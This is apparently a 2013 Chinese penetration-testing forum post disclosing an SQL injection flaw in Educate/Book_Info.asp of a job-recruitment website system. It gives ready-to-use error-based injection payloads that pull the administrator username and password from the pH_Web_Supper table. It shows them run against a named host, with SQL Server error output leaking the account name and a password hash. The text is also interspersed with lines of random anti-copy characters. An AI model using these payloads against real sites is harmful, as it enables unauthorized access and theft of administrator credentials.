中国网络渗透测试联盟
标题:
网络求职招聘人才网站系统正式版漏洞
[打印本页]
作者:
admin
时间:
2013-2-13 23:56
标题:
网络求职招聘人才网站系统正式版漏洞
漏洞出现在Educate/Book_Info.asp
Z6 }: U, Y9 N5 q* y
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
! v ?, c5 G& H* X/ ~1 L$ ^) T% K& y
exp:如下
9 }) x& F7 a$ ~" X
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
) ^' l3 l: H& W
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
t! D& H' _$ ]. @& |7 P
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=
(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
5 I2 M2 V4 r- u( f
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
" m4 O; O" X/ U1 Y/ {
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
' R) h& `# u$ K1 F! Z7 E
/Educate/Book_Info.asp,行 8
6 M7 R$ N0 }7 Z% [" q D
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=
(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
3 \7 }4 I! H2 S& w& U
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
- c, i0 W/ Z- N! ]
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
9 g" M3 x# V4 ~4 \/ _
/Educate/Book_Info.asp,行 8
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2